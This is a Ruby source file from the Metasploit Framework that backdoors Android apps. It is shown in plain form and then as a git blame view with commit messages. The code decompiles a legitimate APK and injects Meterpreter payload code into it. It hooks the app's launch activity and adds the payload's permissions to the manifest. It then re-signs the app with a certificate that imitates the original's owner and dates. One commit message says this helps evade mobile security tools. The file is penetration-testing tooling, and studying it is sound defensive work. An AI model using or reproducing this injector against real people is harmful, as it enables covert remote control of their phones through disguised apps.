metasploit-framework/lib/msf/core/payload/apk.rb

# -*- coding: binary -*-

require 'msf/core'
require 'rex/text'
require 'tmpdir'
require 'nokogiri'
require 'fileutils'
require 'optparse'
require 'open3'
require 'date'

class Msf::Payload::Apk

  def print_status(msg='')
    $stderr.puts "[*] #{msg}"
  end

  def print_error(msg='')
    $stderr.puts "[-] #{msg}"
  end

  def usage
    print_error "Usage: #{$0} -x [target.apk] [msfvenom options]\n"
    print_error "e.g. #{$0} -x messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n"
  end

  def run_cmd(cmd)
    begin
      stdin, stdout, stderr = Open3.popen3(cmd)
      return stdout.read + stderr.read
    rescue Errno::ENOENT
      return nil
    end
  end

  # Find the activity that is opened when you click the app icon
  def find_launcher_activity(amanifest)
    package = amanifest.xpath("//manifest").first['package']
    activities = amanifest.xpath("//activity|//activity-alias")
    for activity in activities
      activityname = activity.attribute("targetActivity")
      unless activityname
        activityname = activity.attribute("name")
      end
      category = activity.search('category')
      unless category
        next
      end
      for cat in category
        categoryname = cat.attribute('name')
        if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN')
          name = activityname.to_s
          if name.start_with?('.')
            name = package + name
          end
          return name
        end
      end
    end
  end

  def parse_manifest(manifest_file)
    File.open(manifest_file, "rb"){|file|
      data = File.read(file)
      return Nokogiri::XML(data)
    }
  end

  def fix_manifest(tempdir)
    #Load payload's manifest
    payload_manifest = parse_manifest("#{tempdir}/payload/AndroidManifest.xml")
    payload_permissions = payload_manifest.xpath("//manifest/uses-permission")

    #Load original apk's manifest
    original_manifest = parse_manifest("#{tempdir}/original/AndroidManifest.xml")
    original_permissions = original_manifest.xpath("//manifest/uses-permission")

    manifest = original_manifest.xpath('/manifest')
    old_permissions = []
    for permission in original_permissions
      name = permission.attribute("name").to_s
      old_permissions << name
    end
    for permission in payload_permissions
      name = permission.attribute("name").to_s
      unless old_permissions.include?(name)
        print_status("Adding #{name}")
        original_permissions.before(permission.to_xml)
      end
    end

    application = original_manifest.at_xpath('/manifest/application')
    application << payload_manifest.at_xpath('/manifest/application/receiver').to_xml
    application << payload_manifest.at_xpath('/manifest/application/service').to_xml

    File.open("#{tempdir}/original/AndroidManifest.xml", "wb") {|file| file.puts original_manifest.to_xml }
  end

  def parse_orig_cert_data(orig_apkfile)
    orig_cert_data = Array[]
    keytool_output = run_cmd("keytool -J-Duser.language=en -printcert -jarfile #{orig_apkfile}")
    owner_line = keytool_output.match(/^Owner:.+/)[0]
    orig_cert_dname = owner_line.gsub(/^.*:/, '').strip
    orig_cert_data.push("#{orig_cert_dname}")
    valid_from_line = keytool_output.match(/^Valid from:.+/)[0]
    from_date_str = valid_from_line.gsub(/^Valid from:/, '').gsub(/until:.+/, '').strip
    to_date_str = valid_from_line.gsub(/^Valid from:.+until:/, '').strip
    from_date = DateTime.parse("#{from_date_str}")
    orig_cert_data.push(from_date.strftime("%Y/%m/%d %T"))
    to_date = DateTime.parse("#{to_date_str}")
    validity = (to_date - from_date).to_i
    orig_cert_data.push("#{validity}")
    return orig_cert_data
  end

  def backdoor_apk(apkfile, raw_payload)
    unless apkfile && File.readable?(apkfile)
      usage
      raise RuntimeError, "Invalid template: #{apkfile}"
    end

    keytool = run_cmd("keytool")
    unless keytool != nil
      raise RuntimeError, "keytool not found. If it's not in your PATH, please add it."
    end

    jarsigner = run_cmd("jarsigner")
    unless jarsigner != nil
      raise RuntimeError, "jarsigner not found. If it's not in your PATH, please add it."
    end

    zipalign = run_cmd("zipalign")
    unless zipalign != nil
      raise RuntimeError, "zipalign not found. If it's not in your PATH, please add it."
    end

    apktool = run_cmd("apktool -version")
    unless apktool != nil
      raise RuntimeError, "apktool not found. If it's not in your PATH, please add it."
    end

    apk_v = Gem::Version.new(apktool)
    unless apk_v >= Gem::Version.new('2.0.1')
      raise RuntimeError, "apktool version #{apk_v} not supported, please download at least version 2.0.1."
    end

    #Create temporary directory where work will be done
    tempdir = Dir.mktmpdir

    keystore = "#{tempdir}/signing.keystore"
    storepass = "android"
    keypass = "android"
    keyalias = "signing.key"
    orig_cert_data = parse_orig_cert_data(apkfile)
    orig_cert_dname = orig_cert_data[0]
    orig_cert_startdate = orig_cert_data[1]
    orig_cert_validity = orig_cert_data[2]

    print_status "Creating signing key and keystore..\n"
    run_cmd("keytool -genkey -v -keystore #{keystore} \
    -alias #{keyalias} -storepass #{storepass} -keypass #{keypass} -keyalg RSA \
    -keysize 2048 -startdate '#{orig_cert_startdate}' \
    -validity #{orig_cert_validity} -dname '#{orig_cert_dname}'")

    File.open("#{tempdir}/payload.apk", "wb") {|file| file.puts raw_payload }
    FileUtils.cp apkfile, "#{tempdir}/original.apk"

    print_status "Decompiling original APK..\n"
    run_cmd("apktool d #{tempdir}/original.apk -o #{tempdir}/original")
    print_status "Decompiling payload APK..\n"
    run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload")

    amanifest = parse_manifest("#{tempdir}/original/AndroidManifest.xml")

    print_status "Locating hook point..\n"
    launcheractivity = find_launcher_activity(amanifest)
    unless launcheractivity
      raise RuntimeError, "Unable to find hookable activity in #{apkfile}\n"
    end
    smalifile = "#{tempdir}/original/smali*/" + launcheractivity.gsub(/\./, "/") + ".smali"
    smalifiles = Dir.glob(smalifile)
    for smalifile in smalifiles
      if File.readable?(smalifile)
        activitysmali = File.read(smalifile)
      end
    end

    unless activitysmali
      raise RuntimeError, "Unable to find hook point in #{smalifiles}\n"
    end

    entrypoint = ';->onCreate(Landroid/os/Bundle;)V'
    unless activitysmali.include? entrypoint
      raise RuntimeError, "Unable to find onCreate() in #{smalifile}\n"
    end

    # Remove unused files
    FileUtils.rm "#{tempdir}/payload/smali/com/metasploit/stage/MainActivity.smali"
    FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali")

    package = amanifest.xpath("//manifest").first['package']
    package_slash = package.gsub(/\./, "/")
    print_status "Adding payload as package #{package}\n"
    payload_files = Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/*.smali")
    payload_dir = "#{tempdir}/original/smali/#{package_slash}/"
    FileUtils.mkdir_p payload_dir

    # Copy over the payload files, fixing up the smali code
    payload_files.each do |file_name|
      smali = File.read(file_name)
      newsmali = smali.gsub(/com\/metasploit\/stage/, package_slash)
      newfilename = "#{payload_dir}#{File.basename file_name}"
      File.open(newfilename, "wb") {|file| file.puts newsmali }
    end

    payloadhook = entrypoint + %Q^
    invoke-static {p0}, L#{package_slash}/MainService;->startService(Landroid/content/Context;)V
    ^
    hookedsmali = activitysmali.gsub(entrypoint, payloadhook)

    print_status "Loading #{smalifile} and injecting payload..\n"
    File.open(smalifile, "wb") {|file| file.puts hookedsmali }

    injected_apk = "#{tempdir}/output.apk"
    aligned_apk = "#{tempdir}/aligned.apk"
    print_status "Poisoning the manifest with meterpreter permissions..\n"
    fix_manifest(tempdir)

    print_status "Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n"
    run_cmd("apktool b -o #{injected_apk} #{tempdir}/original")
    print_status "Signing #{injected_apk}\n"
    run_cmd("jarsigner -sigalg SHA1withRSA -digestalg SHA1 -keystore #{keystore} -storepass #{storepass} -keypass #{keypass} #{injected_apk} #{keyalias}")
    print_status "Aligning #{injected_apk}\n"
    run_cmd("zipalign 4 #{injected_apk} #{aligned_apk}")

    outputapk = File.read(aligned_apk)

    FileUtils.remove_entry tempdir
    outputapk
  end
end
¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00			`# -- coding: binary --`

			`require 'msf/core'`
integrate ./msfvenom -x for android payloads 2015-12-22 15:58:27 +00:00			`require 'rex/text'`
¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00			`require 'tmpdir'`
			`require 'nokogiri'`
			`require 'fileutils'`
			`require 'optparse'`
			`require 'open3'`
Copy original cert data into new signing cert created for APK injection 2016-10-20 15:43:45 +00:00			`require 'date'`
¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00
fix apk injection script to include payload service and receivers 2016-09-26 06:55:25 +00:00			`class Msf::Payload::Apk`
integrate ./msfvenom -x for android payloads 2015-12-22 15:58:27 +00:00
			`def print_status(msg='')`
			`$stderr.puts "[*] #{msg}"`
			`end`

fix error handling 2015-12-24 09:13:56 +00:00			`def print_error(msg='')`
integrate ./msfvenom -x for android payloads 2015-12-22 15:58:27 +00:00			`$stderr.puts "[-] #{msg}"`
			`end`

¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00			`def usage`
fix error handling 2015-12-24 09:13:56 +00:00			`print_error "Usage: #{$0} -x [target.apk] [msfvenom options]\n"`
			`print_error "e.g. #{$0} -x messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n"`
¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00			`end`

			`def run_cmd(cmd)`
			`begin`
			`stdin, stdout, stderr = Open3.popen3(cmd)`
			`return stdout.read + stderr.read`
			`rescue Errno::ENOENT`
			`return nil`
			`end`
			`end`

			`# Find the activity that is opened when you click the app icon`
			`def find_launcher_activity(amanifest)`
			`package = amanifest.xpath("//manifest").first['package']`
			`activities = amanifest.xpath("//activity\|//activity-alias")`
			`for activity in activities`
facebook.orca fixes 2015-12-24 12:21:08 +00:00			`activityname = activity.attribute("targetActivity")`
			`unless activityname`
			`activityname = activity.attribute("name")`
			`end`
¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00			`category = activity.search('category')`
			`unless category`
			`next`
			`end`
			`for cat in category`
			`categoryname = cat.attribute('name')`
			`if (categoryname.to_s == 'android.intent.category.LAUNCHER' \|\| categoryname.to_s == 'android.intent.action.MAIN')`
facebook.orca fixes 2015-12-24 12:21:08 +00:00			`name = activityname.to_s`
			`if name.start_with?('.')`
			`name = package + name`
¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00			`end`
facebook.orca fixes 2015-12-24 12:21:08 +00:00			`return name`
¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00			`end`
			`end`
			`end`
			`end`

fix apk injection script to include payload service and receivers 2016-09-26 06:55:25 +00:00			`def parse_manifest(manifest_file)`
			`File.open(manifest_file, "rb"){\|file\|`
			`data = File.read(file)`
			`return Nokogiri::XML(data)`
¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00			`}`
fix apk injection script to include payload service and receivers 2016-09-26 06:55:25 +00:00			`end`
¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00
fix apk injection script to include payload service and receivers 2016-09-26 06:55:25 +00:00			`def fix_manifest(tempdir)`
			`#Load payload's manifest`
			`payload_manifest = parse_manifest("#{tempdir}/payload/AndroidManifest.xml")`
			`payload_permissions = payload_manifest.xpath("//manifest/uses-permission")`

			`#Load original apk's manifest`
			`original_manifest = parse_manifest("#{tempdir}/original/AndroidManifest.xml")`
			`original_permissions = original_manifest.xpath("//manifest/uses-permission")`

			`manifest = original_manifest.xpath('/manifest')`
			`old_permissions = []`
			`for permission in original_permissions`
			`name = permission.attribute("name").to_s`
			`old_permissions << name`
			`end`
¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00			`for permission in payload_permissions`
fix apk injection script to include payload service and receivers 2016-09-26 06:55:25 +00:00			`name = permission.attribute("name").to_s`
			`unless old_permissions.include?(name)`
			`print_status("Adding #{name}")`
			`original_permissions.before(permission.to_xml)`
¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00			`end`
			`end`

fix apk injection script to include payload service and receivers 2016-09-26 06:55:25 +00:00			`application = original_manifest.at_xpath('/manifest/application')`
			`application << payload_manifest.at_xpath('/manifest/application/receiver').to_xml`
			`application << payload_manifest.at_xpath('/manifest/application/service').to_xml`

			`File.open("#{tempdir}/original/AndroidManifest.xml", "wb") {\|file\| file.puts original_manifest.to_xml }`
¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00			`end`

Copy original cert data into new signing cert created for APK injection 2016-10-20 15:43:45 +00:00			`def parse_orig_cert_data(orig_apkfile)`
			`orig_cert_data = Array[]`
Fixes keytool bug in APK inject code 2016-11-11 14:12:47 +00:00			`keytool_output = run_cmd("keytool -J-Duser.language=en -printcert -jarfile #{orig_apkfile}")`
Copy original cert data into new signing cert created for APK injection 2016-10-20 15:43:45 +00:00			`owner_line = keytool_output.match(/^Owner:.+/)[0]`
Create new signing certificate with dname value copied from original certificate. 2016-10-15 21:05:53 +00:00			`orig_cert_dname = owner_line.gsub(/^.*:/, '').strip`
Copy original cert data into new signing cert created for APK injection 2016-10-20 15:43:45 +00:00			`orig_cert_data.push("#{orig_cert_dname}")`
			`valid_from_line = keytool_output.match(/^Valid from:.+/)[0]`
			`from_date_str = valid_from_line.gsub(/^Valid from:/, '').gsub(/until:.+/, '').strip`
			`to_date_str = valid_from_line.gsub(/^Valid from:.+until:/, '').strip`
			`from_date = DateTime.parse("#{from_date_str}")`
			`orig_cert_data.push(from_date.strftime("%Y/%m/%d %T"))`
			`to_date = DateTime.parse("#{to_date_str}")`
			`validity = (to_date - from_date).to_i`
			`orig_cert_data.push("#{validity}")`
			`return orig_cert_data`
Create new signing certificate with dname value copied from original certificate. 2016-10-15 21:05:53 +00:00			`end`
fix apk injection script to include payload service and receivers 2016-09-26 06:55:25 +00:00
Create new signing certificate with dname value copied from original certificate. 2016-10-15 21:05:53 +00:00			`def backdoor_apk(apkfile, raw_payload)`
¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00			`unless apkfile && File.readable?(apkfile)`
			`usage`
fix error handling 2015-12-24 09:13:56 +00:00			`raise RuntimeError, "Invalid template: #{apkfile}"`
¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00			`end`

Create new signing certificate with dname value copied from original certificate. 2016-10-15 21:05:53 +00:00			`keytool = run_cmd("keytool")`
			`unless keytool != nil`
			`raise RuntimeError, "keytool not found. If it's not in your PATH, please add it."`
			`end`

¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00			`jarsigner = run_cmd("jarsigner")`
			`unless jarsigner != nil`
fix error handling 2015-12-24 09:13:56 +00:00			`raise RuntimeError, "jarsigner not found. If it's not in your PATH, please add it."`
¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00			`end`

Run zipalign as last step during APK injection process Running zipalign on an APK after signing and before distribution is considered general best practice. Also, properly aligning an APK makes it less likely to be flagged as suspicious by mobile security solutions. More on zipalign from Google: https://developer.android.com/studio/command-line/zipalign.html 2016-09-29 03:05:17 +00:00			`zipalign = run_cmd("zipalign")`
			`unless zipalign != nil`
			`raise RuntimeError, "zipalign not found. If it's not in your PATH, please add it."`
			`end`

¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00			`apktool = run_cmd("apktool -version")`
			`unless apktool != nil`
fix error handling 2015-12-24 09:13:56 +00:00			`raise RuntimeError, "apktool not found. If it's not in your PATH, please add it."`
¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00			`end`

			`apk_v = Gem::Version.new(apktool)`
			`unless apk_v >= Gem::Version.new('2.0.1')`
fix error handling 2015-12-24 09:13:56 +00:00			`raise RuntimeError, "apktool version #{apk_v} not supported, please download at least version 2.0.1."`
¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00			`end`

			`#Create temporary directory where work will be done`
			`tempdir = Dir.mktmpdir`

Create new signing certificate with dname value copied from original certificate. 2016-10-15 21:05:53 +00:00			`keystore = "#{tempdir}/signing.keystore"`
			`storepass = "android"`
			`keypass = "android"`
			`keyalias = "signing.key"`
Copy original cert data into new signing cert created for APK injection 2016-10-20 15:43:45 +00:00			`orig_cert_data = parse_orig_cert_data(apkfile)`
			`orig_cert_dname = orig_cert_data[0]`
			`orig_cert_startdate = orig_cert_data[1]`
			`orig_cert_validity = orig_cert_data[2]`
Create new signing certificate with dname value copied from original certificate. 2016-10-15 21:05:53 +00:00
			`print_status "Creating signing key and keystore..\n"`
			`run_cmd("keytool -genkey -v -keystore #{keystore} \`
			`-alias #{keyalias} -storepass #{storepass} -keypass #{keypass} -keyalg RSA \`
Copy original cert data into new signing cert created for APK injection 2016-10-20 15:43:45 +00:00			`-keysize 2048 -startdate '#{orig_cert_startdate}' \`
			`-validity #{orig_cert_validity} -dname '#{orig_cert_dname}'")`
Create new signing certificate with dname value copied from original certificate. 2016-10-15 21:05:53 +00:00
¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00			`File.open("#{tempdir}/payload.apk", "wb") {\|file\| file.puts raw_payload }`
			`FileUtils.cp apkfile, "#{tempdir}/original.apk"`

integrate ./msfvenom -x for android payloads 2015-12-22 15:58:27 +00:00			`print_status "Decompiling original APK..\n"`
¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00			`run_cmd("apktool d #{tempdir}/original.apk -o #{tempdir}/original")`
integrate ./msfvenom -x for android payloads 2015-12-22 15:58:27 +00:00			`print_status "Decompiling payload APK..\n"`
¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00			`run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload")`

fix apk injection script to include payload service and receivers 2016-09-26 06:55:25 +00:00			`amanifest = parse_manifest("#{tempdir}/original/AndroidManifest.xml")`
¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00
facebook.orca fixes 2015-12-24 12:21:08 +00:00			`print_status "Locating hook point..\n"`
¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00			`launcheractivity = find_launcher_activity(amanifest)`
facebook.orca fixes 2015-12-24 12:21:08 +00:00			`unless launcheractivity`
			`raise RuntimeError, "Unable to find hookable activity in #{apkfile}\n"`
			`end`
			`smalifile = "#{tempdir}/original/smali*/" + launcheractivity.gsub(/\./, "/") + ".smali"`
			`smalifiles = Dir.glob(smalifile)`
			`for smalifile in smalifiles`
			`if File.readable?(smalifile)`
			`activitysmali = File.read(smalifile)`
			`end`
			`end`

			`unless activitysmali`
			`raise RuntimeError, "Unable to find hook point in #{smalifiles}\n"`
			`end`

			`entrypoint = ';->onCreate(Landroid/os/Bundle;)V'`
			`unless activitysmali.include? entrypoint`
			`raise RuntimeError, "Unable to find onCreate() in #{smalifile}\n"`
¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00			`end`

fix apk injection script to include payload service and receivers 2016-09-26 06:55:25 +00:00			`# Remove unused files`
			`FileUtils.rm "#{tempdir}/payload/smali/com/metasploit/stage/MainActivity.smali"`
			`FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali")`
facebook.orca fixes 2015-12-24 12:21:08 +00:00
fix apk injection script to include payload service and receivers 2016-09-26 06:55:25 +00:00			`package = amanifest.xpath("//manifest").first['package']`
			`package_slash = package.gsub(/\./, "/")`
			`print_status "Adding payload as package #{package}\n"`
			`payload_files = Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/*.smali")`
			`payload_dir = "#{tempdir}/original/smali/#{package_slash}/"`
			`FileUtils.mkdir_p payload_dir`

			`# Copy over the payload files, fixing up the smali code`
			`payload_files.each do \|file_name\|`
			`smali = File.read(file_name)`
			`newsmali = smali.gsub(/com\/metasploit\/stage/, package_slash)`
			`newfilename = "#{payload_dir}#{File.basename file_name}"`
			`File.open(newfilename, "wb") {\|file\| file.puts newsmali }`
			`end`

			`payloadhook = entrypoint + %Q^`
			`invoke-static {p0}, L#{package_slash}/MainService;->startService(Landroid/content/Context;)V`
			`^`
facebook.orca fixes 2015-12-24 12:21:08 +00:00			`hookedsmali = activitysmali.gsub(entrypoint, payloadhook)`

integrate ./msfvenom -x for android payloads 2015-12-22 15:58:27 +00:00			`print_status "Loading #{smalifile} and injecting payload..\n"`
¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00			`File.open(smalifile, "wb") {\|file\| file.puts hookedsmali }`
fix apk injection script to include payload service and receivers 2016-09-26 06:55:25 +00:00
integrate ./msfvenom -x for android payloads 2015-12-22 15:58:27 +00:00			`injected_apk = "#{tempdir}/output.apk"`
Refactor code that calls zipalign on injected APK 2016-09-29 14:49:50 +00:00			`aligned_apk = "#{tempdir}/aligned.apk"`
integrate ./msfvenom -x for android payloads 2015-12-22 15:58:27 +00:00			`print_status "Poisoning the manifest with meterpreter permissions..\n"`
¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00			`fix_manifest(tempdir)`

integrate ./msfvenom -x for android payloads 2015-12-22 15:58:27 +00:00			`print_status "Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n"`
¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00			`run_cmd("apktool b -o #{injected_apk} #{tempdir}/original")`
integrate ./msfvenom -x for android payloads 2015-12-22 15:58:27 +00:00			`print_status "Signing #{injected_apk}\n"`
Create new signing certificate with dname value copied from original certificate. 2016-10-15 21:05:53 +00:00			`run_cmd("jarsigner -sigalg SHA1withRSA -digestalg SHA1 -keystore #{keystore} -storepass #{storepass} -keypass #{keypass} #{injected_apk} #{keyalias}")`
Run zipalign as last step during APK injection process Running zipalign on an APK after signing and before distribution is considered general best practice. Also, properly aligning an APK makes it less likely to be flagged as suspicious by mobile security solutions. More on zipalign from Google: https://developer.android.com/studio/command-line/zipalign.html 2016-09-29 03:05:17 +00:00			`print_status "Aligning #{injected_apk}\n"`
Refactor code that calls zipalign on injected APK 2016-09-29 14:49:50 +00:00			`run_cmd("zipalign 4 #{injected_apk} #{aligned_apk}")`
¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00
Refactor code that calls zipalign on injected APK 2016-09-29 14:49:50 +00:00			`outputapk = File.read(aligned_apk)`
fix error handling 2015-12-24 09:13:56 +00:00
¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00			`FileUtils.remove_entry tempdir`
fix error handling 2015-12-24 09:13:56 +00:00			`outputapk`
¯\_(ツ)_/¯ 2015-12-22 14:47:55 +00:00			`end`
			`end`